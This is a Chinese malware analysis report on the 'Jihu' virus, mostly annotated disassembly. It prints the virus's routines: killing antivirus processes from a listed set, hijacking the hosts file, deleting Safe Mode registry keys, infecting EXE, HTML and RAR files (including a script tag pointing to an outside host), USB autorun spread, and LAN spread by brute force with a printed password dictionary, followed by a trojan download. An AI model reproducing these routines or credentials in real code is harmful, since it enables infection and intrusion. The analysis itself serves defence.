KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccSvcHst.exe.ccSvcHst.exe.ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.
mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.
TMBMSRV.exe.SfCtlCom.exe.TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.
MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.
360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe.
下面是关闭杀毒软件的步骤:
.text:0040528C mov [ebp+AntiVirsName], offset AntiVName ; 取第一个杀软名
.text:00405293 Next_2:
.text:00405293 mov eax, [ebp+AntiVirsName]
.text:00405296 movsx eax, byte ptr [eax]
.text:00405299 test eax, eax
.text:0040529B jz Over_2 ; 局部变量第一字节为0退出
.text:004052A1 and [ebp+var_8], 0
.text:004052A5 jmp short loc_4052AE
.text:004052A7 Next_1: ; CODE XREF:
.text:004052A7 mov eax, [ebp+var_8]
.text:004052AA inc eax
.text:004052AB mov [ebp+var_8], eax
.text:004052AE loc_4052AE: ; CODE XREF:
.text:004052AE cmp [ebp+var_8], 4
.text:004052B2 jge short GoNext
.text:004052B4 mov [ebp+var_C], 1
.text:004052BB and [ebp+InBuffer], 0
.text:004052BF and [ebp+BytesReturned], 0
.text:004052C3 push [ebp+AntiVirsName] ; 杀毒软件名称列表
.text:004052C6 call CheckProcess ; 检查上面这个进程是否存在
.text:004052CB mov [ebp+InBuffer], eax
.text:004052CE cmp [ebp+InBuffer], 0
.text:004052D2 jnz short loc_4052D6 ; 存在向驱动发送IRP终止
.text:004052D4 jmp short GoNext ; 指定的进程名不存在,取下一个探测
.text:004052D6 loc_4052D6: ; CODE XREF:
.text:004052D6 push 0 ; lpOverlapped
.text:004052D8 lea eax, [ebp+BytesReturned]
.text:004052DB push eax ; lpBytesReturned
.text:004052DC push 0 ; nOutBufferSize
.text:004052DE push 0 ; lpOutBuffer
.text:004052E0 push 4 ; nInBufferSize
.text:004052E2 lea eax, [ebp+InBuffer]
.text:004052E5 push eax ; lpInBuffer
.text:004052E6 push 222264h ; dwIoControlCode
.text:004052EB push [ebp+hDevice] ; hDevice
.text:004052EE call ds:DeviceIoControl ; 发送IRP吗终止杀毒软件
.text:004052F4 mov [ebp+var_C], eax
.text:004052F7 cmp [ebp+var_C], 0
.text:004052FB jnz short SucessControl ; 关闭杀软成功,跳走
.text:004052FD jmp short GoNext
.text:004052FF SucessControl: ; CODE XREF:
.text:004052FF push 32h ; dwMilliseconds
.text:00405301 call ds:Sleep
.text:00405307 jmp short Next_1
.text:00405309 GoNext: ; CODE XREF:
.text:00405309 push 32h ; dwMilliseconds
.text:0040530B call ds:Sleep
.text:00405311 push [ebp+AntiVirsName] ; lpString
.text:00405314 call ds:lstrlenA
.text:0040531A mov ecx, [ebp+AntiVirsName]
.text:0040531D lea eax, [ecx+eax+1]
.text:00405321 mov [ebp+AntiVirsName], eax ; 取下一个杀软名
.text:00405324 jmp Next_2
劫持drivers\\etc\\hosts,屏蔽一系列网址
.text:004066DE mov [ebp+lpBuffer], offset a127_0_0_1Local ; "127.0.0.1 localhost\r\n"
.text:004066E5 and [ebp+NumberOfBytesWritten], 0
.text:004066E9 or [ebp+hObject], 0FFFFFFFFh
.text:004066ED push 104h ; size_t
.text:004066F2 push 0 ; int
.text:004066F4 lea eax, [ebp+FileName]
.text:004066FA push eax ; void *
.text:004066FB call memset
.text:00406700 add esp, 0Ch
.text:00406703 push offset SystemDirector
.text:00406708 push offset aSDriversEtcHos ; "%s\\drivers\\etc\\hosts"
.text:0040670D lea eax, [ebp+FileName]
.text:00406713 push eax ; LPSTR
.text:00406714 call ds:wsprintfA
.text:0040671A add esp, 0Ch
.text:0040671D push 0 ; hTemplateFile
.text:0040671F push 80h ; dwFlagsAndAttributes
.text:00406724 push 3 ; dwCreationDisposition
.text:00406726 push 0 ; lpSecurityAttributes
.text:00406728 push 3 ; dwShareMode
.text:0040672A push 0C0000000h ; dwDesiredAccess
.text:0040672F lea eax, [ebp+FileName]
.text:00406735 push eax ; lpFileName
.text:00406736 call ds:CreateFileA
.text:0040673C mov [ebp+hObject], eax
.text:0040673F push 0 ; lpOverlapped
.text:00406741 lea eax, [ebp+NumberOfBytesWritten]
.text:00406744 push eax ; lpNumberOfBytesWritten
.text:00406745 push [ebp+lpBuffer] ; lpString
.text:00406748 call ds:lstrlenA
.text:0040674E push eax ; nNumberOfBytesToWrite
.text:0040674F push [ebp+lpBuffer] ; lpBuffer
.text:00406752 push [ebp+hObject] ; hFile
.text:00406755 call ds:WriteFile ; 写入"127.0.0.1 localhost\r\n"
删除注册表破坏安全模式
.text:00406963 push offset pszSubKey
; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
.text:00406968 push 80000002h ; hkey
.text:0040696D call ds:SHDeleteKeyA
.text:00406973 push offset aSystemCurren_0
; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
.text:00406978 push 80000002h ; hkey
.text:0040697D call ds:SHDeleteKeyA ; 删除注册表破坏安全模式
接下来是感染文件,首先判断"C:\\Program Files\\WinRAR\\Rar.exe"是否存在
.text:0040634A push offset aCProgramFilesW ; "C:\\Program Files\\WinRAR\\Rar.exe"
.text:0040634F push offset pszPath ; lpString1
.text:00406354 call ds:lstrcpyA
.text:0040635A push offset pszPath ; pszPath
.text:0040635F call ds:PathFileExistsA
.text:00406365 mov CRar_exe, eax
然后获取磁盘类型,避免无效分区和光驱,如果遇到无效和光驱则再次跳回接着感染。
.text:004063C3 push [ebp+lpString] ; lpRootPathName
.text:004063C6 call ds:GetDriveTypeA ; 获取磁盘类型
.text:004063CC mov [ebp+DriveType], eax
.text:004063CF cmp [ebp+DriveType], 1 ; 无效分区DRIVE_NO_ROOT_DIR
.text:004063D3 jbe short Next_2
.text:004063D5 cmp [ebp+DriveType], 5
.text:004063D9 jz short Next_2 ; 当是光驱的时候跳走
如果磁盘是正常则开辟线程感染文件
.text:004063DB push 0
.text:004063DD push 0
.text:004063DF mov eax, [ebp+lpString]
.text:004063E2 push dword ptr [eax] ;文件路径做为参数
.text:004063E4 push offset TaintFile_1 ; 创建线程感染文件
.text:004063E9 push 0
.text:004063EB push 0
.text:004063ED call [ebp+CreateThread]
感染文件之前还要检查路径,排除系统文件被感染,跳过WinRAR,WindowsUpdate,Windows NT,Windows Media Player,Outlook Express,NetMeeting,MSN Gaming Zone,Movie Maker
microsoft frontpage,Messenger,Internet Explorer,InstallShield Installation Information
ComPlus Applications,Common Files,RECYCLER,System Volume Information
Documents and Settings,WinNT,WINDOWS,实现方法如下:
.text:00406220 NextSysFlod:
.text:00406220 mov eax, [ebp+var_35C]
.text:00406226 inc eax
.text:00406227 mov [ebp+var_35C], eax
.text:0040622D loc_40622D:
.text:0040622D cmp [ebp+var_35C], 15h
.text:00406234 jge short loc_40625A
.text:00406236 mov eax, [ebp+var_35C]
.text:0040623C push lpString2[eax*4] ; lpString2
.text:00406243 push [ebp+lpString1] ; lpString1
.text:00406249 call ds:lstrcmpiA ; 与指定的系统目录做比较
.text:0040624F test eax, eax
.text:00406251 jnz short Next_1
.text:00406253 jmp GoOutReturn ; 避免感染系统目录内的文件
.text:00406253 ; 找到系统目录后退出
.text:00406258 Next_1:
.text:00406258 jmp short NextSysFlod
下面通过FindFirstFile和FindNextFile搜寻文件,找到后调用感染函数感染之。
下面是感染exe文件的主要过程,首先创建文件映射,在创建文件映射后修改节区数,映射内存长度,入口点地址,还有新增一个名为.tc的节区,之后定位到文件末尾,在文件末尾写入shell代码以及原OEP。
构造一个新节区:
.text:0040727B mov eax, [ebp+EndOfLastTriv]
.text:00407281 mov [ebp+var_50], eax
.text:00407284 mov [ebp+var_40], 0E0000020h ; 节区属性
.text:0040728B mov ax, word ptr byte_40BE6C
.text:00407291 mov [ebp+var_42], ax
.text:00407295 push 28h ; size_t
.text:00407297 lea eax, [ebp+ct.]
.text:0040729A push eax ; void *
.text:0040729B mov eax, [ebp+NTAddress]
.text:004072A1 add eax, [ebp+NTSecLen]
.text:004072A4 push eax ; void *
.text:004072A5 call memcpy ; 构造新节头
.text:004072AA add esp, 0Ch
.text:004072AD mov eax, [ebp+NTAddress]
.text:004072B3 movzx eax, word ptr [eax+6]
.text:004072B7 inc eax ; 节头数加1
.text:004072B8 mov ecx, [ebp+NTAddress]
.text:004072BE mov [ecx+6], ax
.text:004072C2 mov eax, [ebp+NTAddress]
.text:004072C8 cmp dword ptr [eax+1Ch], 0
.text:004072CC jz short WriteShellCode ; 跳走写shell代码
.text:004072E3 mov eax, [ebp+NTAddress] ; 定位到NT头的地址
.text:004072E9 mov ecx, [ebp+EndOfShellCode]
.text:004072EC mov [eax+28h], ecx ; 修改入口点地址
.text:004072EF mov eax, [ebp+NTAddress]
.text:004072F5 mov eax, [eax+50h]
.text:004072F8 add eax, [ebp+var_5C]
.text:004072FB mov ecx, [ebp+NTAddress]
.text:00407301 mov [ecx+50h], eax ; 修改导入表的地址
.text:00407304 push [ebp+lpBaseAddress] ; lpBaseAddress
.text:00407307 call ds:UnmapViewOfFile
.text:0040731E push 2 ; dwMoveMethod
.text:00407320 push 0 ; lpDistanceToMoveHigh
.text:00407322 mov eax, [ebp+SplcaeEnd]
.text:00407328 add eax, [ebp+var_54]
.text:0040732B push eax ; lDistanceToMove
.text:0040732C push [ebp+hFile] ; hFile
.text:0040732F call ds:SetFilePointer
.text:00407335 push [ebp+hFile] ; hFile
.text:00407338 call ds:SetEndOfFile
.text:0040733E push 2 ; dwMoveMethod
.text:00407340 push 0 ; lpDistanceToMoveHigh
.text:00407342 xor eax, eax
.text:00407344 sub eax, [ebp+var_54]
.text:00407347 push eax ; lDistanceToMove
.text:00407348 push [ebp+hFile] ; hFile
.text:0040734B call ds:SetFilePointer ; 定位到文件结尾
.text:00407351 push 0 ; lpOverlapped
.text:00407353 lea eax, [ebp+NumberOfBytesWritten]
.text:00407356 push eax ; lpNumberOfBytesWritten
.text:00407357 push 297h ; nNumberOfBytesToWrite
.text:0040735C push offset loc_409BA8 ; lpBuffer
.text:00407361 push [ebp+hFile] ; hFile
.text:00407364 call ds:WriteFile ; 写入感染exe的代码
.text:0040736A push 0 ; lpOverlapped
.text:0040736C lea eax, [ebp+NumberOfBytesWritten]
.text:0040736F push eax ; lpNumberOfBytesWritten
.text:00407370 push nNumberOfBytesToWrite
; nNumberOfBytesToWrite
.text:00407376 push lpBuffer ; lpBuffer
.text:0040737C push [ebp+hFile] ; hFile
.text:0040737F call ds:WriteFile
.text:00407385 push 1 ; dwMoveMethod
.text:00407387 push 0 ; lpDistanceToMoveHigh
.text:00407389 xor eax, eax
.text:0040738B sub eax, nNumberOfBytesToWrite
.text:00407391 sub eax, 2Bh
.text:00407394 push eax ; lDistanceToMove
.text:00407395 push [ebp+hFile] ; hFile
.text:00407398 call ds:SetFilePointer
.text:0040739E push 0 ; lpOverlapped
.text:004073A0 lea eax, [ebp+NumberOfBytesWritten]
.text:004073A3 push eax ; lpNumberOfBytesWritten
.text:004073A4 push 4 ; nNumberOfBytesToWrite
.text:004073A6 push offset nNumberOfBytesToWrite ; lpBuffer
.text:004073AB push [ebp+hFile] ; hFile
.text:004073AE call ds:WriteFile
.text:004073B4 mov eax, [ebp+EndOfShellCode]
.text:004073B7 add eax, 297h
.text:004073BC mov ecx, [ebp+OEP] ; 保存OEP
.text:004073C2 sub ecx, eax
.text:004073C4 mov [ebp+Buffer], ecx ; 重定位OEP
.text:004073C7 push 2 ; dwMoveMethod
.text:004073C9 push 0 ; lpDistanceToMoveHigh
.text:004073CB xor eax, eax
.text:004073CD sub eax, [ebp+var_54]
.text:004073D0 push eax ; lDistanceToMove
.text:004073D1 push [ebp+hFile] ; hFile
.text:004073D4 call ds:SetFilePointer
.text:004073DA push 1 ; dwMoveMethod
.text:004073DC push 0 ; lpDistanceToMoveHigh
.text:004073DE push 293h ; lDistanceToMove
.text:004073E3 push [ebp+hFile] ; hFile
.text:004073E6 call ds:SetFilePointer
.text:004073EC push 0 ; lpOverlapped
.text:004073EE lea eax, [ebp+NumberOfBytesWritten]
.text:004073F1 push eax ; lpNumberOfBytesWritten
.text:004073F2 push 4 ; nNumberOfBytesToWrite
.text:004073F4 lea eax, [ebp+Buffer]
.text:004073F7 push eax ; lpBuffer
.text:004073F8 push [ebp+hFile] ; hFile
.text:004073FB call ds:WriteFile ; 将OEP写入被感染的exe文件
.text:00407401 push 1 ; int
.text:00407403 lea eax, [ebp+CreationTime]
.text:00407409 push eax ; lpCreationTime
.text:0040740A push [ebp+hFile] ; hFile
.text:0040740D call FileOldTime ; 将被感染的文件的时间设置成之前的时间
对于html和htm,asp,apsl格式文件则在该文件末尾写上一串<script type=""text/javascript"" src=""http://web.nba1001.net:8888/tj/tongji.js""></script>实现方法如下:
.text:00405AA9 push 0 ; hTemplateFile
.text:00405AAB push 80h ; dwFlagsAndAttributes
.text:00405AB0 push 3 ; dwCreationDisposition
.text:00405AB2 push 0 ; lpSecurityAttributes
.text:00405AB4 push 0 ; dwShareMode
.text:00405AB6 push 0C0000000h ; dwDesiredAccess
.text:00405ABB push [ebp+lpFileName] ; lpFileName
.text:00405ABE call ds:CreateFileA ; 打开文件句柄
.text:00405AC4 mov [ebp+hFile], eax
.text:00405AC7 cmp [ebp+hFile], 0FFFFFFFFh
.text:00405ACB jnz short loc_405AD6
.text:00405ACD or [ebp+var_4], 0FFFFFFFFh
.text:00405AD1 jmp loc_405B6A
.text:00405AD6 loc_405AD6: ; CODE XREF:
.text:00405AD6 push 0 ; int
.text:00405AD8 lea eax, [ebp+CreationTime]
.text:00405ADB push eax ; lpCreationTime
.text:00405ADC push [ebp+hFile] ; hFile
.text:00405ADF call FileOldTime ; 保留文件创建时间
.text:00405AE4 push offset unk_40C690 ; lpString1
.text:00405AE9 push [ebp+hFile] ; hFile
.text:00405AEC call ReadMySlef
.text:00405AF1 test eax, eax
.text:00405AF3 jnz short loc_405B04
.text:00405AF5 push [ebp+hFile] ; hObject
.text:00405AF8 call ds:CloseHandle
.text:00405AFE or [ebp+var_4], 0FFFFFFFFh
.text:00405B02 jmp short loc_405B6A
.text:00405B04 loc_405B04: ; CODE XREF: TaintThisFile+117 j
.text:00405B04 push 2 ; dwMoveMethod
.text:00405B06 push 0 ; lpDistanceToMoveHigh
.text:00405B08 push 0 ; lDistanceToMove
.text:00405B0A push [ebp+hFile] ; hFile
.text:00405B0D call ds:SetFilePointer ; 移动文件指针到末尾
.text:00405B13 push 0 ; lpOverlapped
.text:00405B15 lea eax, [ebp+NumberOfBytesWritten]
.text:00405B18 push eax ; lpNumberOfBytesWritten
.text:00405B19 push offset unk_40C690 ; lpString
.text:00405B1E call ds:lstrlenA
.text:00405B24 push eax ; nNumberOfBytesToWrite
.text:00405B25 push offset unk_40C690 ; lpBuffer
.text:00405B2A push [ebp+hFile] ; hFile
.text:00405B2D call ds:WriteFile ; 将感染字符串写入到文件的末尾
.text:00405B33 push 1 ; int
.text:00405B35 lea eax, [ebp+CreationTime]
.text:00405B38 push eax ; lpCreationTime
.text:00405B39 push [ebp+hFile] ; hFile
.text:00405B3C call FileOldTime ; 设置时间到之前
.text:00405B41 push [ebp+hFile] ; hObject
.text:00405B44 call ds:CloseHandle
如果是RAR文件则跳到这里,病毒会调用C:\\Program Files\\WinRAR\\Rar.exe,并加%s X -ibck \"%s\" \"%s\\\的参数把压缩包中的文件释放到临时目录。然后感染解压出来的的exe,rar,htm,html,asp,aspx等文件,感染完毕会调用rar.exe加参数%s M -ibck -r -o+ -ep1 \"%s\" \"%s\\*\把压缩包放回
.text:004060D9 TaintRAR: ; CODE XREF:
.text:004060D9 push offset aRar ; "rar"
.text:004060DE push [ebp+lpString1] ; lpString1
.text:004060E4 call ds:lstrcmpiA ; 如果判断是rar则跳到这里来感染
.text:004060EA test eax, eax
.text:004060EC jnz short GameOver
.text:004060EE and [ebp+hObject], 0
.text:004060F5 push 0 ; lpThreadId
.text:004060F7 push 0 ; dwCreationFlags
.text:004060F9 lea eax, [ebp+Parameter]
.text:004060FF push eax ; lpParameter
.text:00406100 push offset TaintRAR ; lpStartAddress
.text:00406105 push 0 ; dwStackSize
.text:00406107 push 0 ; lpThreadAttributes
.text:00406109 call ds:CreateThread ; 开新线程感染rar压缩包
.text:0040612D push 0FFFFFFFFh ; dwMilliseconds
.text:0040612F push [ebp+hObject] ; hHandle
.text:00406135 call ds:WaitForSingleObject ; 等待感染rar的线程结束
下面是感染过程
.text:00405C17 push 0
.text:00405C19 push 80h
.text:00405C1E push 3
.text:00405C20 push 0
.text:00405C22 push 3
.text:00405C24 push 0C0000000h
.text:00405C29 lea eax, [ebp+FileName]
.text:00405C2F push eax
.text:00405C30 call [ebp+CreateFileA] ; 创建文件句柄
.text:00405C36 mov [ebp+hFile], eax
.text:00405C3C push 0 ; lpFileSizeHigh
.text:00405C3E push [ebp+hFile] ; hFile
.text:00405C44 call ds:GetFileSize
.text:00405C4A mov [ebp+var_40C], eax
.text:00405C50 cmp [ebp+var_40C], 0
.text:00405C57 jz short GoOutReturn ; 文件长度为0跳走退出
.text:00405C59 cmp [ebp+var_40C], 0FFFFFFFFh
.text:00405C60 jz short GoOutReturn ; 获取文件长度失败跳走退出
.text:00405C62 cmp [ebp+var_40C], 0A00000h
.text:00405C6C ja short GoOutReturn ; 文件过大退出
.text:00405C6E cmp [ebp+var_40C], 2800h
.text:00405C78 jnb short loc_405C90
.text:00405C9F call FileOldTime ; 获取该文件源创建时间\\
.text:00405D84 push eax ; lpStartupInfo
.text:00405D85 push 0 ; lpCurrentDirectory
.text:00405D87 push 0 ; lpEnvironment
.text:00405D89 push 0C000000h ; dwCreationFlags
.text:00405D8E push 1 ; bInheritHandles
.text:00405D90 push 0 ; lpThreadAttributes
.text:00405D92 push 0 ; lpProcessAttributes
.text:00405D94 lea eax, [ebp+CommandLine]
.text:00405D9A push eax ; lpCommandLine
.text:00405D9B push 0 ; lpApplicationName
.text:00405D9D call ds:CreateProcessA ; 将C:\\Program Files\\WinRAR\\Rar.exe,; 并加%s X -ibck \"%s\" \"%s\\\内以命令行参数运行之
.text:00405E3B call TaintFile_0 ; 解压压缩包后感染压缩包内的文件
.text:00405EB3 push eax ; lpStartupInfo
.text:00405EB4 push 0 ; lpCurrentDirectory
.text:00405EB6 push 0 ; lpEnvironment
.text:00405EB8 push 0C000000h ; dwCreationFlags
.text:00405EBD push 1 ; bInheritHandles
.text:00405EBF push 0 ; lpThreadAttributes
.text:00405EC1 push 0 ; lpProcessAttributes
.text:00405EC3 lea eax, [ebp+CommandLine]
.text:00405EC9 push eax ; lpCommandLine
.text:00405ECA push 0 ; lpApplicationName
.text:00405ECC call ds:CreateProcessA ; 再将压缩程序并入"%s M -ibck -r -o+ -ep1 \"%s\" \"%s\\*\""以命令行参数运行之,将感染后的文件打包压缩回去
.text:00405F03 push 0 ; hTemplateFile
.text:00405F05 push 80h ; dwFlagsAndAttributes
.text:00405F0A push 3 ; dwCreationDisposition
.text:00405F0C push 0 ; lpSecurityAttributes
.text:00405F0E push 3 ; dwShareMode
.text:00405F10 push 0C0000000h ; dwDesiredAccess
.text:00405F15 lea eax, [ebp+FileName]
.text:00405F1B push eax ; lpFileName
.text:00405F1C call ds:CreateFileA ; 创建文件句柄,准备将感染后的rar文件设置成原来的时间.text:00405F22 mov [ebp+hFile], eax
.text:00405F28 push 1 ; int
.text:00405F2A lea eax, [ebp+CreationTime]
.text:00405F30 push eax ; lpCreationTime
.text:00405F31 push [ebp+hFile] ; hFile
.text:00405F37 call FileOldTime ; 将被感染后的RAR文件设置成原来的时间
下面是感染磁盘的过程,过程为搜索磁盘并判断类型,如果是可移动磁盘则获得系统内的盘符,查找可移动存储,并把自身复制到这个盘下面的
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\setup.exe,并创建autorun.inf文件,过程如下:
.text:00408B08 push eax
.text:00408B09 call [ebp+GetDriveTypeA]
.text:00408B0C cmp eax, 2
.text:00408B0F jnz short GoOutGetNext ; 非可移动磁盘,跳走
.text:00408B11 lea eax, [ebp+var_18]
.text:00408B14 push eax
.text:00408B15 call FautorunWR ; 在磁盘上创建autorunini
.text:0040870E push offset aSetup_exe ; "Setup.exe"
.text:00408713 lea eax, [ebp+PathName]
.text:00408719 push eax
.text:0040871A push offset aSS ; "%s\\%s"
.text:0040871F lea eax, [ebp+FileName]
.text:00408725 push eax ; LPSTR
.text:00408726 call ds:wsprintfA ; 构建recycle.{645FF040-5081-101B-9F08-00AA002F954E}\setup.exe路径
.text:00408836 push 1 ; dwFlags
.text:00408838 lea eax, [ebp+NewFileName]
.text:0040883E push eax ; lpNewFileName
.text:0040883F lea eax, [ebp+pszPath]
.text:00408845 push eax ; lpExistingFileName
.text:00408846 call ds:MoveFileExA ; 将自身复制过去
该病毒通过局域网传播,使用用户名Administrator Guest Admin Root
用户密码:
234.password.6969.harley.123456.golf.pussy.mustang. 1111.shadow.1313.fish.5150.7777.qwerty.baseball.2112.letmein.
12345678.12345.ccc.admin.5201314.qq520.1.12.123.1234567.
123456789.654321.54321.111.000000.abc.pw.11111111.
88888888.pass.passwd.database.abcd.abc123.pass.sybase.
123qwe.server.computer.520.super.123asd.0.ihavenopass.
godblessyou.enable.xp.2002.2003.2600.alpha.110.111111.
121212.123123.1234qwer.
123abc.007.a.aaa.patrick.pat.administrator.root.sex.god.
fuckyou.fuck.abc.test.test123.temp.temp123.win.pc.asdf.pwd.
qwer.yxcv.zxcv.home.xxx.owner.login.Login.pw123.love.mypc.
mypc123.admin123.mypass.mypass123.901100.
下面是攻击局域网用户
.text:004083F1 mov [ebp+lpUserName], offset UserName_0 ; 取第一个用户名
.text:004083F8 UserNext:
.text:004083F8 mov eax, [ebp+lpUserName]
.text:004083FB movsx eax, byte ptr [eax]
.text:004083FE test eax, eax
.text:00408400 jz loc_408492
.text:00408406 cmp [ebp+var_4], 0
.text:0040840A jnz loc_408492
.text:00408410 mov [ebp+var_54], 1
.text:00408417 mov [ebp+lpPassword], offset UserPassword ; 取第一个密码
PassWordNext:
.text:0040841E mov eax, [ebp+lpPassword]
.text:00408421 movsx eax, byte ptr [eax]
.text:00408424 test eax, eax
.text:00408426 jz short GetNextUserName
.text:00408428 cmp [ebp+var_54], 1
.text:0040842C jnz short SendVirToNet
.text:0040842E mov [ebp+lpPassword], offset UserName
.text:00408435 SendVirToNet: ; CODE XREF:
.text:00408435 push [ebp+lpPassword] ; lpPassword
.text:00408438 push [ebp+lpUserName] ; lpUserName
.text:0040843B lea eax, [ebp+String1]
.text:0040843E push eax ; int
.text:0040843F call SendVirNet ; 上传病毒到局域网电脑上设置3分钟后运行
.text:00408444 cmp eax, 1
.text:00408447 jnz short loc_408452
.text:00408449 mov [ebp+var_4], 1
.text:00408450 jmp short GetNextUserName
.text:00408452 loc_408452: ; CODE XREF:
.text:00408452 cmp [ebp+var_54], 1
.text:00408456 jnz short loc_408465
.text:00408458 mov [ebp+lpPassword], offset UserPassword
.text:0040845F and [ebp+var_54], 0
.text:00408463 jmp short GoNextPassWord ; 跳回接着比较
.text:00408465 loc_408465: ; CODE XREF:
.text:00408465 push [ebp+lpPassword] ; lpString
.text:00408468 call ds:lstrlenA
.text:0040846E mov ecx, [ebp+lpPassword]
.text:00408471 lea eax, [ecx+eax+1]
.text:00408475 mov [ebp+lpPassword], eax ; 取下一个密码
.text:00408478 GoNextPassWord: ; CODE XREF:
.text:00408478 jmp short PassWordNext ; 跳回接着比较
.text:0040847A GetNextUserName: ; CODE XREF:
.text:0040847A push [ebp+lpUserName] ; lpString
.text:0040847D call ds:lstrlenA
.text:00408483 mov ecx, [ebp+lpUserName]
.text:00408486 lea eax, [ecx+eax+1]
.text:0040848A mov [ebp+lpUserName], eax ; 取下一个用户名
.text:0040848D jmp UserNext
上传的时首先构建at命了,设置上传成功后三分钟运行,上传位置到C:\CONFIG.EXE
.text:00408354 push offset aConfig ; "CONFIG"
.text:00408359 movzx eax, [ebp+SystemTime.wMinute]
.text:00408360 add eax, 3
.text:00408363 push eax
.text:00408364 movzx eax, [ebp+SystemTime.wHour]
.text:0040836B push eax
.text:0040836C push [ebp+arg_0]
.text:0040836F push offset aAtSDDCS_exe ; "at \\\\%s %d:%d C:\\%s.exe"
.text:00408374 lea eax, [ebp+CmdLine]
.text:0040837A push eax ; 设置at命令
.text:0040837B call [ebp+var_24]
.text:0040837E add esp, 18h
.text:00408381 push 0 ; uCmdShow
.text:00408383 lea eax, [ebp+CmdLine]
.text:00408389 push eax ; lpCmdLine
.text:0040838A call ds:WinExec ; 运行at命令..
.text:00408397 push [ebp+hObject] ; hObject
.text:0040839A call ds:CloseHandle
.text:004083A0 loc_4083A0: ; CODE XREF:
.text:004083A0 push 1 ; fForce
.text:004083A2 push 1 ; dwFlags
.text:004083A4 lea eax, [ebp+Name]
.text:004083A7 push eax ; lpName
.text:004083A8 call WNetCancelConnection2A ;
下面是下载木马的过程
.text:00402DAC GetNextIP:
.text:00402DAC xor eax, eax
.text:00402DAE inc eax
.text:00402DAF jz FailReturn
.text:00402DB5 push 40h ; size_t
.text:00402DB7 push 0 ; int
.text:00402DB9 lea eax, [ebp+String2]
.text:00402DBF push eax ; void *
.text:00402DC0 call memset
.text:00402DC5 add esp, 0Ch
.text:00402DC8 push 0 ; int
.text:00402DCA push 40h ; dwAddressStringLength
.text:00402DCC lea eax, [ebp+String2]
.text:00402DD2 push eax ; lpString2
.text:00402DD3 push [ebp+arg_8] ; int
.text:00402DD6 push [ebp+var_4] ; int
.text:00402DD9 call GetAddrInfo ; 获取地址信息
.text:00402DDE test eax, eax
.text:00402DE0 jnz short SucessGetAdd ; 获取地址信息成功跳走下载木马
.text:00402DE2 and [ebp+var_8], 0
.text:00402DE6 jmp short FailReturn ; 获取地址信息失败跳走
.text:00402DE8 SucessGetAdd:
.text:00402DE8 push 400h ; size_t
.text:00402DED push 0 ; int
.text:00402DEF lea eax, [ebp+var_410]
.text:00402DF5 push eax ; void *
.text:00402DF6 call memset
.text:00402DFB add esp, 0Ch
.text:00402DFE push [ebp+arg_4]
.text:00402E01 push dword_40BE64 ; 1F90h
.text:00402E07 lea eax, [ebp+String2]
.text:00402E0D push eax
.text:00402E0E push offset aHttpSDS ; "http://%s:%d/%s"
.text:00402E13 lea eax, [ebp+var_410]
.text:00402E19 push eax ; LPSTR
.text:00402E1A call ds:wsprintfA ; 构造木马路径
.text:00402E20 add esp, 14h
.text:00402E23 push [ebp+lpFileName] ; lpFileName
.text:00402E26 call ds:DeleteFileA
.text:00402E2C push [ebp+lpFileName] ; lpFileName
.text:00402E2F lea eax, [ebp+var_410]
.text:00402E35 push eax ; int
.text:00402E36 call ReadInternetFile ; 从网上读取数据
.text:00402E3B cmp eax, 1
.text:00402E3E jnz short SucessRead ; 读取成功通过这里跳回接着读取
.text:00402E40 mov [ebp+var_8], 1
.text:00402E47 jmp short FailReturn
.text:00402E49 SucessRead:
.text:00402E49 jmp GetNextIP
附件中的病毒为隐藏文件,注意在虚拟机中调试
- 标 题:极虎(虎虎生威)病毒分析报告
- 作 者:梦旅人
- 时 间:2010-03-14 17:55:12
- 链 接:http://bbs.pediy.com/showthread.php?t=108880